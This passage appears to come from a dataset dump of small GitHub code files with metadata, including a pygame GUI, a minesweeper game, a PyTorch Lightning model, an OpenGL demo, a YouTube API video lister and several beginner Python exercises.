[\"Name\", \"Position\", \"Energy\", \"Peak Energy\", \"Generation\", \"Birthday\", \"Age\", \"Children\",\n \"Child Invest\", \"Brain Size\"]\n positions = []\n for index, label in enumerate(labels):\n positions.append((label, (x, (index+1)*y)))\n positions.insert(0, (\"Selected Bot\", (x, x)))\n return positions\n\n def render(self):\n # TODO: Make this cleaner\n data = self._poll_data()\n if data is None:\n data = ['-' for _ in range(len(self.labels_map))]\n self.surface.fill(self.bg_color)\n for index, pair in enumerate(self.labels_map):\n label, pos = pair\n label_surface = self.writer.get_text_surface(label, self.text_color)\n if self.text_scale > 1:\n new_width = label_surface.get_width() * self.text_scale\n new_height = label_surface.get_height() * self.text_scale\n label_surface = pygame.transform.scale(label_surface, (new_width, new_height))\n # label_surface = self.font.render(label, 0, color)\n self.surface.blit(label_surface, pos)\n if index > 0:\n amount_surface = self.writer.get_text_surface(str(data[index-1]), self.text_color)\n if self.text_scale > 1:\n new_width = amount_surface.get_width() * self.text_scale\n new_height = amount_surface.get_height() * self.text_scale\n amount_surface = pygame.transform.scale(amount_surface, (new_width, new_height))\n # amount_surface = self.font.render(str(data[index-1]), 0, color)\n self.surface.blit(amount_surface, (11, pos[1]+(11 * self.text_scale)))\n\n def _poll_data(self):\n if self.world.selected_bot:\n bot = 
self.world.selected_bot\n data = [bot.name, str((int(bot.x), int(bot.y))), bot.energy, bot.peak_energy,\n bot.generation_number, bot.birthday,\n '%d (%d%%)' % (bot.age, int(bot.age/bot.max_age*100)),\n bot.number_children, bot.child_investment, len(bot.behavior.behavior_nodes)]\n return data\n else:\n return None\n\n\nclass GraphPanel(BasePanel):\n # TODO: Reduce lag probably caused by this class\n def __init__(self, world_watcher, width, height, text_scale, text_color, bg_color):\n super(GraphPanel, self).__init__(width, height, text_scale, text_color, bg_color)\n self.world_watcher = world_watcher\n self.granularity = 1\n self.plants = collections.deque(maxlen=self.width)\n self.bots = collections.deque(maxlen=self.width)\n self.signals = collections.deque(maxlen=self.width)\n self.max_value = 1\n\n def _plot_line(self, array, color, thickness):\n x = 0\n for value in array:\n y = (self.height + 3) - (((value+1)/(self.max_value+1)) * self.height)\n # Make sure the maximum value is drawn on the graph\n if y <= 6:\n y = 6\n pygame.draw.rect(self.surface, color, (x-1, int(y)-4, 2, 2), 1)\n x += 1\n\n def render(self):\n self.surface.fill(self.bg_color)\n for array, color in ((self.plants, (40, 220, 40)),\n (self.bots, (220, 40, 220)), (self.signals, (40, 40, 220))):\n self._plot_line(array, color, 2)\n\n def poll_data(self):\n if self.plants and self.bots and self.signals:\n self.max_value = max(max(self.plants), max(self.bots), max(self.signals))\n else:\n self.max_value = 1\n self.plants.append(self.world_watcher.plant_numbers[-1])\n self.bots.append(self.world_watcher.bot_numbers[-1])\n self.signals.append(self.world_watcher.signal_numbers[-1])\n\n def resize_surface(self, new_size):\n super().resize_surface(new_size)\n # Reset the size of each deque and repopulate it with data\n world_plants = self.world_watcher.plant_numbers\n world_bots = self.world_watcher.bot_numbers\n world_signals = self.world_watcher.signal_numbers\n self.plants = collections.deque(world_plants, self.width)\n self.bots = collections.deque(world_bots, self.width)\n self.signals = collections.deque(world_signals, self.width)\n\n\nclass TextWriter:\n def __init__(self, filename, char_width, char_height, border_gap, chars_per_row):\n self.font_surface = pygame.image.load(os.getcwd() + os.sep + filename)\n self.char_height = char_height\n self.char_width = char_width\n self.char_border = border_gap\n self.chars_per_row = chars_per_row\n self.char_map = {}\n for i in range(32, 128):\n char_index = i-32\n row = char_index // self.chars_per_row\n col = char_index % self.chars_per_row\n x_coord = (self.char_border * (col + 1)) + (col * self.char_width)\n y_coord = (self.char_border * (row + 1)) + (row * self.char_height)\n self.char_map[chr(i)] = (x_coord, y_coord, self.char_width, self.char_height)\n\n def get_text_surface(self, text, text_color):\n chars_surface = pygame.Surface(((len(text) * self.char_width) + len(text), self.char_height),\n depth=self.font_surface)\n for i, char in enumerate(text):\n if char in self.char_map:\n rect = self.char_map[char]\n else:\n rect = self.char_map[chr(127)]\n chars_surface.blit(self.font_surface, ((i * self.char_width) + i, 0,\n self.char_width, self.char_height), rect)\n pixel_array = pygame.PixelArray(chars_surface)\n pixel_array.replace((0, 0, 0), text_color)\n return 
chars_surface\n","repo_name":"sjirjies/nss","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":15874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"35116291904","text":"import mock\r\nimport numpy as np\r\nimport unittest\r\n\r\nfrom dotscanner.ui.MicroscopeImage import MicroscopeImage\r\nfrom tests.ui.FakeUserSettings import FakeUserSettings\r\n\r\n\r\nclass TestMicroscopeImage(unittest.TestCase):\r\n @mock.patch(\"dotscanner.dataprocessing.getData\")\r\n def getMicroscopeImageAndUserSettings(self, mock_getData):\r\n mock_getData.return_value = np.array([\r\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 5, 8, 0, 0, 1, 0, 0, 0],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 10, 0, 0, 0, 0, 0, 0, 0],\r\n [0, 0, 0, 7, 0, 0, 0, 0, 1],\r\n [0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n ])\r\n userSettings = FakeUserSettings(\r\n filepath=\"test/directory/\", dotSize=2, blobSize=5, saveFigures=False,\r\n startImage=\"fakeImage01.png\", skipsAllowed=3, removeEdgeFrames=True, lowerContrast=0.0,\r\n upperContrast=5.0, lowerDotThresh=1.5, upperDotThresh=5.0, lowerBlobThresh=2.0,\r\n program=\"density\", polygon=None)\r\n\r\n return MicroscopeImage(\"test/directory/\", \"filename.png\", userSettings), userSettings\r\n\r\n def test_properLoading_whenClassInitializes(self):\r\n microscopeImage, userSettings = self.getMicroscopeImageAndUserSettings()\r\n\r\n self.assertEqual(userSettings.dotSize, 2)\r\n self.assertEqual(userSettings.blobSize, 5)\r\n self.assertEqual(userSettings.saveFigures, False)\r\n self.assertEqual(userSettings.startImage, \"fakeImage01.png\")\r\n self.assertEqual(userSettings.skipsAllowed, 3)\r\n self.assertEqual(userSettings.removeEdgeFrames, True)\r\n self.assertEqual(microscopeImage.thresholds, (1.5, 5.0, 2.0))\r\n self.assertIn(3, microscopeImage.dotCoords)\r\n self.assertIn(1, microscopeImage.dotCoords[3])\r\n self.assertEqual(microscopeImage.blobCoords, {})\r\n\r\n @mock.patch('settings.config.THRESHOLD_DELTA', 0.1)\r\n @mock.patch('settings.config.LOWER_DOT_THRESH_SCALE', 1.5)\r\n def test_decreaseLowerDotThreshScale(self):\r\n microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n microscopeImage.decreaseLowerDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.lowerDotThreshScale, 1.4)\r\n\r\n microscopeImage.decreaseLowerDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.lowerDotThreshScale, 1.3)\r\n\r\n @mock.patch('settings.config.THRESHOLD_DELTA', 0.1)\r\n @mock.patch('settings.config.LOWER_DOT_THRESH_SCALE', 1.5)\r\n def test_increaseLowerDotThreshScale(self):\r\n microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n microscopeImage.increaseLowerDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.lowerDotThreshScale, 1.6)\r\n\r\n microscopeImage.increaseLowerDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.lowerDotThreshScale, 1.7)\r\n\r\n @mock.patch('settings.config.THRESHOLD_DELTA', 0.1)\r\n @mock.patch('settings.config.UPPER_DOT_THRESH_SCALE', 5.0)\r\n def test_decreaseUpperDotThreshScale(self):\r\n microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n microscopeImage.decreaseUpperDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.upperDotThreshScale, 4.9)\r\n\r\n microscopeImage.decreaseUpperDotThreshScale()\r\n\r\n self.assertEqual(microscopeImage.upperDotThreshScale, 4.8)\r\n\r\n @mock.patch('settings.config.THRESHOLD_DELTA', 0.1)\r\n @mock.patch('settings.config.UPPER_DOT_THRESH_SCALE', 5.0)\r\n def 
test_increaseUpperDotThreshScale(self):\r\n        microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n        microscopeImage.increaseUpperDotThreshScale()\r\n\r\n        self.assertEqual(microscopeImage.upperDotThreshScale, 5.1)\r\n\r\n        microscopeImage.increaseUpperDotThreshScale()\r\n\r\n        self.assertEqual(microscopeImage.upperDotThreshScale, 5.2)\r\n\r\n    def test_setThresholds(self):\r\n        microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n        microscopeImage.setThresholds((1.26, 5.2, 3))\r\n\r\n        self.assertEqual(microscopeImage.thresholds, (1.3, 5.2, 3.0))\r\n\r\n    def test_updateThresholds(self):\r\n        microscopeImage, _ = self.getMicroscopeImageAndUserSettings()\r\n\r\n        microscopeImage.lowerDotThreshScale = 1.2\r\n        microscopeImage.lowerBlobThreshScale = 2.2\r\n        microscopeImage.updateThresholds()\r\n\r\n        self.assertEqual(microscopeImage.thresholds, (1.2, 5.0, 2.2))\r\n\r\n\r\nif __name__ == '__main__':\r\n    unittest.main()\r\n","repo_name":"bdavis222/dotscanner","sub_path":"tests/ui/test_MicroscopeImage.py","file_name":"test_MicroscopeImage.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"17079804246","text":"import re\n\nfin = open(\"a.txt\", \"r\")\ntxt = fin.read()\nfin.close()\ncropped = re.findall(r\"Tip \\d+(?:.*\\n){1,3}.*\", txt)\ncropped.pop(2)\ncropped = [str(i).replace(\"\\n\", \":\", 1).replace(\"\\n\", \"\") for i in cropped]\nfout = open(\"Tips.txt\", \"w\")\nfor j in cropped:\n    fout.write(j + \"\\n\\n\")\nfout.close()\n","repo_name":"enesgarip/tipstotxt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1927838398","text":"from typing import Optional, Any, List\n\nimport torch\nfrom torch import nn\n\nimport pytorch_lightning as pl\n\nfrom torchmetrics import MeanAbsoluteError, MeanSquaredError, MetricCollection\n\nfrom utils import Normalizer\nfrom torch_geometric.data import Batch\n\n\nclass EnergyModel(pl.LightningModule):\n    def __init__(\n        self,\n        model: nn.Module,\n        lr: float = 1e-3,\n        weight_decay: float = 0.0,\n        normalize_labels: bool = False,\n        mean: Optional[float] = None,\n        std: Optional[float] = None,\n    ):\n        super().__init__()\n        self.save_hyperparameters(ignore=[\"model\"])\n        self.model = model\n        self.criterion = nn.L1Loss()\n        self.normalize_labels = normalize_labels\n        if self.normalize_labels:\n            mean = 0 if mean is None else mean\n            std = 1 if std is None else std\n            self.normalizer = Normalizer(mean=mean, std=std, device=self.device)\n\n        metrics = MetricCollection([MeanAbsoluteError(), MeanSquaredError()])\n        self.train_metrics = metrics.clone(prefix=\"train/\")\n        self.val_metrics = metrics.clone(prefix=\"val/\")\n\n    def forward(self, x: Batch):\n        output = self.model(x)\n\n        if output.shape[-1] == 1:\n            output = output.view(-1)\n\n        return output\n\n    def step(self, batch: Batch):\n        preds = self.forward(batch)\n        targets = batch.y_relaxed\n\n        if self.normalize_labels:\n            norm_targets = self.normalizer.norm(targets)\n            denorm_preds = self.normalizer.denorm(preds)\n            loss = self.criterion(preds, norm_targets)\n            return loss, denorm_preds, targets\n\n        loss = self.criterion(preds, targets)\n\n        return loss, preds, targets\n\n    def training_step(self, batch: Batch, batch_idx: int):\n        loss, preds, targets = self.step(batch)\n\n        # log train metrics\n        self.log(\"train/loss\", loss, on_step=True, 
on_epoch=True, prog_bar=False)\n self.log_dict(\n self.train_metrics(preds, targets),\n on_step=True,\n on_epoch=True,\n prog_bar=True,\n )\n\n # we can return here dict with any tensors\n # and then read it in some callback or in training_epoch_end() below\n # remember to always return loss from training_step, or else backpropagation will fail!\n return {\"loss\": loss, \"preds\": preds, \"targets\": targets}\n\n def training_epoch_end(self, outputs: List[Any]):\n # `outputs` is a list of dicts returned from `training_step()`\n pass\n\n def validation_step(self, batch: Batch, batch_idx: int):\n loss, preds, targets = self.step(batch)\n\n # log val metrics\n self.log(\"val/loss\", loss, on_step=False, on_epoch=True, prog_bar=False)\n self.log_dict(\n self.val_metrics(preds, targets),\n on_step=False,\n on_epoch=True,\n prog_bar=True,\n )\n\n return {\"loss\": loss, \"preds\": preds, \"targets\": targets}\n\n def validation_epoch_end(self, outputs: List[Any]):\n pass\n\n def test_step(self, batch: Batch, batch_idx: int):\n pass\n\n def test_epoch_end(self, outputs: List[Any]):\n pass\n\n def configure_optimizers(self):\n optimizer = torch.optim.AdamW(\n params=self.model.parameters(),\n lr=self.hparams.lr,\n weight_decay=self.hparams.weight_decay,\n )\n return [optimizer], []\n","repo_name":"Irlirion/ocp-lightning","sub_path":"src/models/energy_model.py","file_name":"energy_model.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5828384199","text":"dias_uteis = int(input(\"Quantos dias úteis teve no mês? \"))\r\nhoras_trabalho = float(input(\"Quantas horas foram trabalhadas pelo trabalhador? \"))\r\nsala_hora = float(input(\"Quantos reais você ganha por hora? 
\"))\r\nhora_total = dias_uteis * 8\r\nsalario =sala_hora * hora_total\r\n# print(salario)\r\nif horas_trabalho > hora_total:\r\n \r\n salario_extra = (horas_trabalho - hora_total) * sala_hora / 2\r\n salario = round (salario_extra + salario,2)\r\n print(salario)\r\nelse:\r\n salario = round (sala_hora * hora_total,2)\r\n print(salario)\r\n ","repo_name":"Abner-Ferreira/Python_Exercicios","sub_path":"estrutura_if/ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24965054952","text":"import urllib.request\nimport json\nimport math\nimport sys\n\n#Get list of videos from Youtube channel\ndef getVideos(maxResults, uploadId, key,nextPageToken, videosOutput):\n videos = []\n # construct the API url\n urld = searchURL+\"/playlistItems?part=snippet%2CcontentDetails&maxResults=\"+maxResults+\"&playlistId=\"+uploadId+\"&key=\"+key+\"&pageToken=\"+nextPageToken \n # open the API url and read the response\n with urllib.request.urlopen(urld) as url:\n datad = json.loads(url.read())\n # print the URL for debugging purposes\n print(urld)\n \n # loop through the items in the response\n for data in datad['items']:\n # get the title and video id\n ntitle = data['snippet']['title']\n nlink = data['contentDetails']['videoId']\n # add the video information to the output list\n videosOutput.append([nlink,ntitle])\n # check if there's a next page token\n if 'nextPageToken' in datad:\n nextPageToken = datad['nextPageToken']\n #recursive call \n getVideos(maxResults, uploadId, key, nextPageToken, videosOutput)\n\n# API key for accessing the YouTube API\nkey = \"API_KEY\"\n# base URL for a YouTube video\nvideoURL = \"http://www.youtube.com/watch?v=\"\n# base URL for the YouTube API\nsearchURL = \"https://www.googleapis.com/youtube/v3\"\n# maximum number of results to retrieve per API call\nmaxResults= \"50\"\n# variable to keep track of the next page token\nnextPageToken = \"\"\n\n#List of channels : mention if you are pasting channel id or username - \"id\" or \"forUsername\"\nytids = []\n# open the input file containing the list of channels\nwith open(sys.argv[1]) as file:\n ytids = file.read().splitlines() \nfile.close() \nvideos = []\n\n# loop through the list of channels\nfor ytid in ytids:\n # construct the API url to get the channel's details\n urld = searchURL+\"/channels?part=contentDetails&id=\"+ytid+\"&key=\"+key \n # open the API url and read the response\n with urllib.request.urlopen(urld) as url:\n datad = json.loads(url.read())\n # print the response for debugging purposes\n print(datad)\n # get the channel's uploads details\n uploadsdet = datad['items']\n \n# loop through the videos and print their URLs and titles\nfor link,title in videos:\n print(videoURL+link, title)\n","repo_name":"pdelteil/youtubeDownloader","sub_path":"getVideoURLsFromChannels.py","file_name":"getVideoURLsFromChannels.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1214926601","text":"# Copyright (c) 2023 Alexa George-Catalin. 
All rights reserved.\r\nimport threading\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom utils import cell_interactions\r\nfrom utils import restart_game\r\nfrom utils import drawing_table\r\nfrom utils import countdown\r\ndef initialize_game(\r\n game_width,\r\n game_height,\r\n bomb_count,\r\n top_frame,\r\n win,\r\n game_frame,\r\n second_count,\r\n):\r\n \"\"\"Setează datele jocului când este necesar (la prima inițializare a jocului sau la un restart al acestuia)\"\"\"\r\n game_width = int(game_width)\r\n game_height = int(game_height)\r\n mine_cells = cell_interactions.create_mines(game_width, game_height, bomb_count)\r\n neighbour_mines = cell_interactions.show_neighbours(game_width, game_height, mine_cells)\r\n is_flagged = []\r\n for i in range(game_height):\r\n is_flagged.append([])\r\n for j in range(game_width):\r\n is_flagged[i].append(False)\r\n\r\n restart_button = ttk.Button(\r\n top_frame,\r\n text=\"Restart\",\r\n command=lambda: restart_game.restart(\r\n win,\r\n bomb_count,\r\n game_frame,\r\n top_frame,\r\n game_width,\r\n game_height,\r\n bomb_count,\r\n restart_button,\r\n second_count,\r\n ),\r\n )\r\n win.update()\r\n restart_button.place(relx=0.5, rely=0.5, anchor=\"center\")\r\n\r\n drawn_cells = drawing_table.draw_table(\r\n int(game_width),\r\n int(game_height),\r\n game_frame,\r\n mine_cells,\r\n win,\r\n neighbour_mines,\r\n is_flagged,\r\n top_frame,\r\n game_width,\r\n game_height,\r\n bomb_count,\r\n restart_button,\r\n second_count,\r\n )\r\n for i in range(int(game_height)):\r\n for j in range(int(game_width)):\r\n drawn_cells[i][j].bind(\r\n \"\",\r\n lambda e, row=i, column=j: cell_interactions.flagger(\r\n row,\r\n column,\r\n drawn_cells,\r\n is_flagged,\r\n ),\r\n )\r\n\r\n second = StringVar()\r\n second.set(str(second_count))\r\n second_label = Label(\r\n top_frame,\r\n width=5,\r\n font=(\"Arial\", 13, \"\"),\r\n textvariable=second,\r\n bg=\"#7c8d91\",\r\n fg=\"red\",\r\n )\r\n second_label.place(x=0, y=0)\r\n\r\n temp = int(second.get())\r\n th = threading.Thread(\r\n target=countdown.timer,\r\n args=[\r\n temp,\r\n second,\r\n win,\r\n game_frame,\r\n top_frame,\r\n game_width,\r\n game_height,\r\n bomb_count,\r\n restart_button,\r\n second_count,\r\n ],\r\n )\r\n th.start()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AlexaGeorgeCatalin/Minesweeper","sub_path":"utils/game_initialization.py","file_name":"game_initialization.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25572728737","text":"a=input(\"please tell about status about Harry Rohan and hamad \")\np=int(input(\"1 and 2\"))\nif a==\"harry\" and p==1:\n x=open(\"f1.txt\",'r')\n o= x.read()\n print(o)\nelif a==\"harry\" and p==2:\n x1=open('f2.txt','r')\n o1=x1.read()\n print(o1)\nelif a==\"rohan\" and p==1:\n s=open(\"f3.txt\",'r')\n s1=s.read()\n print(s1)\nelif a=='rohan' and p==2:\n c=open(\"f4.txt\",'r')\n c1=c.read()\n print(c1)\nelif a==\"hamad \" and p==1:\n v=open(\"f5.txt\",'r')\n v1=v.read()\n print(v1)\nelif a=='hamad' and p==2:\n k=open('f6.txt',\"r\")\n k1= k.read()\n print(k1)\n# else:\n# print(\"you dial in valid\")","repo_name":"joshistavan/summer__python","sub_path":"ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42917488113","text":"from OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom Prisma import *\nfrom random 
import Random\nimport sys\n\ntotal_sides = 3\nmax_sides = 15\nmin_sides = 3\n\nangle = 0\n\nangle_x = angle_y = angle_z = 0\n\nprism = Prisma(total_sides)\n\n\ndef draw():\n global angle, angle_x, angle_y, angle_z\n\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n glPushMatrix()\n glRotatef(angle, angle_x, angle_y, angle_z)\n prism.draw()\n glPopMatrix()\n\n angle += 10\n angle_x += Random().randrange(0, 2)\n angle_y += Random().randrange(0, 10)\n angle_z += Random().randrange(0, 5)\n\n glutSwapBuffers()\n\n\ndef timer(_):\n glutPostRedisplay()\n glutTimerFunc(50, timer, 1)\n\n\ndef reshape(w, h):\n glViewport(0, 0, w, h)\n glMatrixMode(GL_PROJECTION)\n gluPerspective(45, float(w) / float(h), 0.1, 30.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n where = (4, 0, 0)\n to = (0, 0, 0)\n direction = (1, 1, 0)\n gluLookAt(*where, *to, *direction)\n\n\ndef init():\n mat_ambient = (0.5, 1.0, 0.0, 1.0)\n mat_diffuse = (0.0, 1.0, 0.0, 1.0)\n mat_specular = (0.0, 1.0, 0.0, 1.0)\n mat_shininess = (100,)\n\n glClearColor(0.0, 0.0, 0.0, 0.0)\n glShadeModel(GL_FLAT)\n\n glMaterialfv(GL_FRONT, GL_AMBIENT, mat_ambient)\n glMaterialfv(GL_FRONT, GL_DIFFUSE, mat_diffuse)\n glMaterialfv(GL_FRONT, GL_SPECULAR, mat_specular)\n glMaterialfv(GL_FRONT, GL_SHININESS, mat_shininess)\n\n # Iluminação\n light_position = (0, 30, -10)\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT0)\n glLightfv(GL_LIGHT0, GL_POSITION, light_position)\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_MULTISAMPLE)\n\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n glBegin(GL_TRIANGLES);\n glColor3f(1, 0, 0);\n glVertex2f(-0.8, -0.8);\n glColor3f(0, 1, 0);\n glVertex2f(0.8, -0.8);\n glColor3f(0, 0, 1);\n glVertex2f(0, 0.9);\n glEnd();\n\n\ndef init_glut():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGBA | GLUT_DEPTH | GLUT_MULTISAMPLE)\n glutInitWindowSize(1280, 720)\n glutCreateWindow(\"Prisma | Piramide\")\n glutReshapeFunc(reshape)\n glutDisplayFunc(draw)\n glutTimerFunc(50, timer, 1)\n init()\n glutMainLoop()\n\n\nif __name__ == '__main__':\n init_glut()\n","repo_name":"mhbarros/computacao-grafica","sub_path":"P2/4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1790468241","text":"# Borrowed from Pytorch3D\n\nimport torch\nfrom typing import NamedTuple\nimport torch.nn as nn\nfrom typing import Sequence, Union\n\n\ndef convert_to_tensors_and_broadcast(*args, dtype: torch.dtype = torch.float32,):\n \"\"\"\n Helper function to handle parsing an arbitrary number of inputs (*args)\n which all need to have the same batch dimension.\n The output is a list of tensors.\n\n Args:\n *args: an arbitrary number of inputs\n Each of the values in `args` can be one of the following\n - Python scalar\n - Torch scalar\n - Torch tensor of shape (N, K_i) or (1, K_i) where K_i are\n an arbitrary number of dimensions which can vary for each\n value in args. 
In this case each input is broadcast to a\n tensor of shape (N, K_i)\n dtype: data type to use when creating new tensors.\n\n Output:\n args: A list of tensors of shape (N, K_i)\n \"\"\"\n # Convert all inputs to tensors with a batch dimension\n args_1d = [format_tensor(c, dtype) for c in args]\n\n # Find broadcast size\n sizes = [c.shape[0] for c in args_1d]\n N = max(sizes)\n\n args_Nd = []\n for c in args_1d:\n if c.shape[0] != 1 and c.shape[0] != N:\n msg = \"Got non-broadcastable sizes %r\" % sizes\n raise ValueError(msg)\n\n # Expand broadcast dim and keep non broadcast dims the same size\n expand_sizes = (N,) + (-1,) * len(c.shape[1:])\n args_Nd.append(c.expand(*expand_sizes))\n\n if len(args) == 1:\n args_Nd = args_Nd[0] # Return the first element\n\n return args_Nd\n\n\ndef format_tensor(input, dtype: torch.dtype = torch.float32,) -> torch.Tensor:\n \"\"\"\n Helper function for converting a scalar value to a tensor.\n\n Args:\n input: Python scalar, Python list/tuple, torch scalar, 1D torch tensor\n dtype: data type for the input\n device: Device (as str or torch.device) on which the tensor should be placed.\n\n Returns:\n input_vec: torch tensor with optional added batch dimension.\n \"\"\"\n if not torch.is_tensor(input):\n input = torch.tensor(input, dtype=dtype)\n\n if input.dim() == 0:\n input = input.view(1)\n\n return input\n\n\nclass BlendParams(NamedTuple):\n \"\"\"\n Data class to store blending params with defaults\n\n Members:\n sigma (float): Controls the width of the sigmoid function used to\n calculate the 2D distance based probability. Determines the\n sharpness of the edges of the shape.\n Higher => faces have less defined edges.\n gamma (float): Controls the scaling of the exponential function used\n to set the opacity of the color.\n Higher => faces are more transparent.\n background_color: RGB values for the background color as a tuple or\n as a tensor of three floats.\n \"\"\"\n\n sigma: float = 1e-4\n gamma: float = 1e-4\n background_color: Union[torch.Tensor, Sequence[float]] = (1.0, 1.0, 1.0)","repo_name":"shivangi-aneja/ClipFace","sub_path":"model/renderer/illumination/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"60"} +{"seq_id":"4461934225","text":"import random\n\ndef MakeAnswer():\n global chiken,rabbit,ChikenLeg,RabbitLeg\n chiken = random.randint(1,20)\n rabbit = random.randint(1,20)\n ChikenLeg = chiken * 2\n RabbitLeg = rabbit * 4\n return chiken,rabbit,ChikenLeg,RabbitLeg\n\ndef CheckWrong(InputSay):\n Wrong = True\n global temp\n while Wrong:\n try:\n temp = int(input(InputSay))\n except ValueError:\n print('输入错误,你只能输入整数!')\n else:\n Wrong = False\n return temp\n\ndef CheckAnswer(InputRabbit,InputChiken,Rabbit,Chiken):\n if InputChiken == Chiken:\n print(\"鸡的数量正确!\")\n else:\n print(\"鸡的数量不正确!!实际上有\"+str(chiken)+\"只鸡在笼子里!.\")\n\n if InputRabbit == rabbit:\n print(\"兔子的数量正确!\")\n else:\n print(\"兔子的数量不正确!!实际上有\"+str(chiken)+\"只兔子在笼子里!.\")\n\nwhile True:\n MakeAnswer()\n print(\"笼子里有\"+str(chiken+rabbit)+\"个头.有\"+str(ChikenLeg+RabbitLeg)+\"只腿在地上.\")\n CheckWrong('有多少兔子在笼子里?')\n InputRabbit = temp\n CheckWrong('有多少鸡在笼子里?')\n InputChiken = temp\n CheckAnswer(InputRabbit,InputChiken,rabbit,chiken)\n","repo_name":"gjc2010gys/BadboyKillerChinese","sub_path":"鸡兔同笼.py","file_name":"鸡兔同笼.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} 
+{"seq_id":"22637166543","text":"import matplotlib.pyplot as plt\n\nlabels = 'German', 'English', 'Others (all < 1%)'\nsizes = [83, 11, 6]\nexplode = (0.1, 0, 0) # only \"explode\" the 1ST slice\n\nfig1, ax1 = plt.subplots()\n\nax1.pie(sizes, explode=explode, labels=labels, colors= ['#756bb1', '#bcbddc', '#c7c5cd'], autopct='%1.0f%%',\n shadow=False, startangle=90)\nax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\nax1.set_title(\"Language of all #IchbinHanna Tweets\")\nplt.savefig('../pie_users.png', dpi=300)\nplt.show()\n","repo_name":"LaserStefan/IchbinHanna","sub_path":"code/piechart.py","file_name":"piechart.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"60"} +{"seq_id":"15442619046","text":"n,k = map(int,input().split())\n\nm = 10**9 + 7\n\n\n\n#print(ans)\n\nrr = 0\nmx = 0\nmn = 0\nfor i in range(k):\n mx += (n-i)%m\n mn += i%m\n\n#print(mx)\n#print(mn)\n#print(\"-------\")\nrr = mx-mn+1\n#print(rr)\n#print(\"-------\")\npp = rr\nfor j in range(k+1,n+2):\n mn_p = j-1\n mx_p = n-j+1\n #print(mn_p,mx_p)\n if(mx_p==0 or mn_p == n):\n pp += 1\n break\n else:\n pp += rr +mx_p - mn_p\n rr = rr +mx_p - mn_p\n #print(pp)\n \n \n \nprint(pp%m) \n \n \n","repo_name":"na2shell/AtCoder","sub_path":"contest/abc163/ABC163-D.py","file_name":"ABC163-D.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27055012885","text":"\"\"\"Bonus: agrega otras figuras geométricas a tu programa y que el usuario pueda escoger cuál calcular.\n\"\"\"\n\nimport math\n\nPI = math.pi\n \n\ndef main(): \n intro = \"\"\"\n Select a geometric figure: \n 1 -> Cilinder\n 2 -> Pyramid\n 3 -> Cone\n 4 -> Cube\n 5 -> Sphere\n\n Option: \"\"\" \n\n option = int(input(intro)) \n\n if option == 1:\n vol_cilinder()\n elif option == 2:\n vol_pyramid()\n elif option == 3:\n vol_cone()\n elif option == 4:\n vol_cube()\n elif option == 5:\n vol_sphere()\n else:\n print(\"Select a correct option\")\n\n\ndef vol_cilinder():\n height = int(input(\"Type de cilinder's height in cm: \"))\n radius = int(input(\"Type de cilinder's radius in cm: \"))\n area = PI * (radius**2)\n vol_cil = round((area * height), 2)\n print(f\"The cilinder's volume is: {vol_cil} cubic cm\")\n\n \ndef vol_pyramid():\n side_a = int(input(\"Type de triangle's side_a in cm: \"))\n side_b = int(input(\"Type de triangle's side_b in cm: \"))\n height = int(input(\"Type de triangle's heigh in cm: 